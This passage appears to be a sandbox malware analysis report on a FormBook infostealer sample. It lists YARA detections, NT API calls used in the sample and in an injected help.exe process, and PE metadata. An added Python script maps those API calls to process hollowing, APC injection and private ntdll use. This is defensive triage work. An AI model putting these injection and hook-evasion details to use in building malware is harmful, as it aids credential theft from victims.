          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_004181B0 NtCreateFile,3_2_004181B0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00418260 NtReadFile,3_2_00418260
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_004182E0 NtClose,3_2_004182E0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00418390 NtAllocateVirtualMemory,3_2_00418390
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01779910
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017799A0 NtCreateSection,LdrInitializeThunk,3_2_017799A0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01779860
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779840 NtDelayExecution,LdrInitializeThunk,3_2_01779840
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_017798F0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A50 NtCreateFile,LdrInitializeThunk,3_2_01779A50
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A20 NtResumeThread,LdrInitializeThunk,3_2_01779A20
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01779A00
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779540 NtReadFile,LdrInitializeThunk,3_2_01779540
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017795D0 NtClose,LdrInitializeThunk,3_2_017795D0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779710 NtQueryInformationToken,LdrInitializeThunk,3_2_01779710
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779FE0 NtCreateMutant,LdrInitializeThunk,3_2_01779FE0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_017797A0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779780 NtMapViewOfSection,LdrInitializeThunk,3_2_01779780
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01779660
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017796E0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779950 NtQueueApcThread,3_2_01779950
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017799D0 NtCreateProcessEx,3_2_017799D0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177B040 NtSuspendThread,3_2_0177B040
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779820 NtEnumerateKey,3_2_01779820
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017798A0 NtWriteVirtualMemory,3_2_017798A0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779B00 NtSetValueKey,3_2_01779B00
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177A3B0 NtGetContextThread,3_2_0177A3B0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A10 NtQuerySection,3_2_01779A10
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A80 NtOpenDirectoryObject,3_2_01779A80
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779560 NtWriteFile,3_2_01779560
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177AD30 NtSetContextThread,3_2_0177AD30
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779520 NtWaitForSingleObject,3_2_01779520
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017795F0 NtQueryInformationFile,3_2_017795F0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177A770 NtOpenThread,3_2_0177A770
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779770 NtSetInformationFile,3_2_01779770
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779760 NtOpenProcess,3_2_01779760
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779730 NtQueryVirtualMemory,3_2_01779730
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177A710 NtOpenProcessToken,3_2_0177A710
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779670 NtQueryInformationProcess,3_2_01779670
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779650 NtQueryValueKey,3_2_01779650
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779610 NtEnumerateValueKey,3_2_01779610
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017796D0 NtCreateKey,3_2_017796D0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09A50 NtCreateFile,LdrInitializeThunk,14_2_02E09A50
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09860 NtQuerySystemInformation,LdrInitializeThunk,14_2_02E09860
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09840 NtDelayExecution,LdrInitializeThunk,14_2_02E09840
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E099A0 NtCreateSection,LdrInitializeThunk,14_2_02E099A0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_02E09910
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E096E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_02E096E0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E096D0 NtCreateKey,LdrInitializeThunk,14_2_02E096D0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_02E09660
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09650 NtQueryValueKey,LdrInitializeThunk,14_2_02E09650
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09FE0 NtCreateMutant,LdrInitializeThunk,14_2_02E09FE0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09780 NtMapViewOfSection,LdrInitializeThunk,14_2_02E09780
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09710 NtQueryInformationToken,LdrInitializeThunk,14_2_02E09710
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E095D0 NtClose,LdrInitializeThunk,14_2_02E095D0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09540 NtReadFile,LdrInitializeThunk,14_2_02E09540
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09A80 NtOpenDirectoryObject,14_2_02E09A80
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09A20 NtResumeThread,14_2_02E09A20
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09A00 NtProtectVirtualMemory,14_2_02E09A00
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09A10 NtQuerySection,14_2_02E09A10
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E0A3B0 NtGetContextThread,14_2_02E0A3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09B00 NtSetValueKey,14_2_02E09B00
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E098F0 NtReadVirtualMemory,14_2_02E098F0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E098A0 NtWriteVirtualMemory,14_2_02E098A0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E0B040 NtSuspendThread,14_2_02E0B040
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09820 NtEnumerateKey,14_2_02E09820
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E099D0 NtCreateProcessEx,14_2_02E099D0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09950 NtQueueApcThread,14_2_02E09950
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09670 NtQueryInformationProcess,14_2_02E09670
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09610 NtEnumerateValueKey,14_2_02E09610
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E097A0 NtUnmapViewOfSection,14_2_02E097A0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09760 NtOpenProcess,14_2_02E09760
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E0A770 NtOpenThread,14_2_02E0A770
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09770 NtSetInformationFile,14_2_02E09770
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09730 NtQueryVirtualMemory,14_2_02E09730
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E0A710 NtOpenProcessToken,14_2_02E0A710
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E095F0 NtQueryInformationFile,14_2_02E095F0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09560 NtWriteFile,14_2_02E09560
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09520 NtWaitForSingleObject,14_2_02E09520
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E0AD30 NtSetContextThread,14_2_02E0AD30
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A81B0 NtCreateFile,14_2_003A81B0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A8260 NtReadFile,14_2_003A8260
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A82E0 NtClose,14_2_003A82E0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A8390 NtAllocateVirtualMemory,14_2_003A8390
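The native-API entries above are the raw material for an injection-capability triage. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in that exact format, groups the NtXxx names per process, flags two API combinations that the author maps to process hollowing and APC injection (an analyst heuristic, not a sandbox signature), and lists APIs that resolve at two different addresses inside the same process. The last check is the interesting one here: NtCreateFile, NtReadFile, NtClose and NtAllocateVirtualMemory appear once inside the unpacked image at 0x00400000 and again in the 0x0177xxxx range of PID 3 (0x02E0xxxx in help.exe), just above the 0x01710000 (0x02DA0000) region in which the report later finds the wntdll.pdb debug string, which is consistent with the payload calling a privately loaded second copy of ntdll rather than the one a user-mode hook would see. The sample lines are copied from the report; TECHNIQUES and the function names are the author's own.

```python
"""Summarise Joe Sandbox 'Code function' evidence lines per process.
Added example; the TECHNIQUES mapping is the author's assumption."""
import re
from collections import defaultdict

# Constructed excerpt: lines copied verbatim from the report above.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_004181B0 NtCreateFile,3_2_004181B0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A50 NtCreateFile,LdrInitializeThunk,3_2_01779A50
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017799D0 NtCreateProcessEx,3_2_017799D0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_017797A0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017798A0 NtWriteVirtualMemory,3_2_017798A0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177AD30 NtSetContextThread,3_2_0177AD30
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779A20 NtResumeThread,LdrInitializeThunk,3_2_01779A20
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01779950 NtQueueApcThread,3_2_01779950
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0177A770 NtOpenThread,3_2_0177A770
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E09A50 NtCreateFile,LdrInitializeThunk,14_2_02E09A50
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A81B0 NtCreateFile,14_2_003A81B0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E0A3B0 NtGetContextThread,14_2_02E0A3B0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 0_2_00469272 0_2_00469272
"""

# "<pid>_<phase>_<addr> <api>,<api>,...,<pid>_<phase>_<addr>"; the API list is
# optional (crypto-function entries carry none) and the function id repeats.
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>\S+)\s+Code function:\s*"
    r"(?P<func>(?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8}))"
    r"(?:\s+(?P<apis>[A-Za-z0-9_]+(?:,[A-Za-z0-9_]+)*))?\s*,?\s*(?P=func)\s*$"
)

# Assumption: the author's heuristic API sets, not a Joe Sandbox signature.
TECHNIQUES = {
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection",
                          "NtWriteVirtualMemory", "NtSetContextThread",
                          "NtResumeThread"},
    "APC injection": {"NtOpenThread", "NtQueueApcThread"},
}


def parse_code_functions(text):
    """Return {(pid, image_basename): {api_name: {addresses}}}."""
    table = defaultdict(lambda: defaultdict(set))
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or not m.group("apis"):
            continue                      # unparsable, or no API names listed
        key = (int(m.group("pid")), m.group("image").rsplit("\\", 1)[-1])
        addr = int(m.group("addr"), 16)
        for api in m.group("apis").split(","):
            if api.startswith("Nt"):      # keep native wrappers, drop Ldr* xrefs
                table[key][api].add(addr)
    return table


def techniques_for(api_table):
    """Technique names whose full API set is present in this process."""
    present = set(api_table)
    return sorted(name for name, need in TECHNIQUES.items() if need <= present)


def duplicated_apis(api_table):
    """APIs that resolve at more than one address in one process: one wrapper
    in the payload image plus another in a second, separately loaded copy."""
    return sorted(api for api, addrs in api_table.items() if len(addrs) > 1)


def summarise(text):
    return {
        key: {
            "apis": sorted(api_table),
            "techniques": techniques_for(api_table),
            "duplicated": duplicated_apis(api_table),
        }
        for key, api_table in parse_code_functions(text).items()
    }


if __name__ == "__main__":
    for (pid, image), info in sorted(summarise(REPORT_LINES).items()):
        print(pid, image, info["techniques"], "duplicated:", info["duplicated"])
```

Run against the full list above, PID 3 and PID 14 both carry the complete hollowing and APC sets; the excerpt embedded in the block only gives PID 3 both and PID 14 neither, which is what the duplicated-address check still catches for help.exe.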
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 0_2_00469272 0_2_00469272
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 0_2_00C8C508 0_2_00C8C508
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 0_2_0046208E 0_2_0046208E
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 2_2_003F911F 2_2_003F911F
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 2_2_003F2050 2_2_003F2050
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041B960 3_2_0041B960
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041C212 3_2_0041C212
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041CB21 3_2_0041CB21
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00408C50 3_2_00408C50
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041B493 3_2_0041B493
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00402D88 3_2_00402D88
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041CE0C 3_2_0041CE0C
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041CF16 3_2_0041CF16
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00BC911F 3_2_00BC911F
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01754120 3_2_01754120
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0173F900 3_2_0173F900
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_018020A8 3_2_018020A8
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_018028EC 3_2_018028EC
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017F1002 3_2_017F1002
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0180E824 3_2_0180E824
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017620A0 3_2_017620A0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0174B090 3_2_0174B090
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017F03DA 3_2_017F03DA
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01802B28 3_2_01802B28
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017FDBD2 3_2_017FDBD2
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0176EBB0 3_2_0176EBB0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_018022AE 3_2_018022AE
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01730D20 3_2_01730D20
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_018025DD 3_2_018025DD
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01802D07 3_2_01802D07
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0174D5E0 3_2_0174D5E0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01801D55 3_2_01801D55
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01762581 3_2_01762581
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017FD466 3_2_017FD466
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0174841F 3_2_0174841F
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0180DFCE 3_2_0180DFCE
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01801FF1 3_2_01801FF1
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01756E30 3_2_01756E30
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_017FD616 3_2_017FD616
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_01802EF7 3_2_01802EF7
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00BC2050 3_2_00BC2050
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E922AE 14_2_02E922AE
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E8DBD2 14_2_02E8DBD2
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DFEBB0 14_2_02DFEBB0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E92B28 14_2_02E92B28
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E928EC 14_2_02E928EC
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E920A8 14_2_02E920A8
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DDB090 14_2_02DDB090
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DF20A0 14_2_02DF20A0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E9E824 14_2_02E9E824
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E81002 14_2_02E81002
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DCF900 14_2_02DCF900
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DE4120 14_2_02DE4120
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E92EF7 14_2_02E92EF7
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DE6E30 14_2_02DE6E30
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E8D616 14_2_02E8D616
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E91FF1 14_2_02E91FF1
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E8D466 14_2_02E8D466
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DD841F 14_2_02DD841F
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E925DD 14_2_02E925DD
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DDD5E0 14_2_02DDD5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DF2581 14_2_02DF2581
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E91D55 14_2_02E91D55
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E92D07 14_2_02E92D07
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02DC0D20 14_2_02DC0D20
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003ACB21 14_2_003ACB21
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_00398C50 14_2_00398C50
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_00392D90 14_2_00392D90
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_00392D88 14_2_00392D88
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003ACE0C 14_2_003ACE0C
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003ACF16 14_2_003ACF16
Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_00392FB0 14_2_00392FB0
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: String function: 0173B150 appears 45 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02DCB150 appears 35 times
Source: s6G3ZtvHZg.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: s6G3ZtvHZg.exe, 00000000.00000002.259685906.0000000007520000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll2 vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe, 00000000.00000000.234473638.0000000000524000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe, 00000000.00000002.258856185.0000000006E40000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll" vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe, 00000000.00000002.259599436.0000000007420000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe, 00000002.00000002.248880539.00000000004B4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe, 00000003.00000002.294686922.00000000019BF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe, 00000003.00000000.249711283.0000000000C84000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe Binary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
Source: s6G3ZtvHZg.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
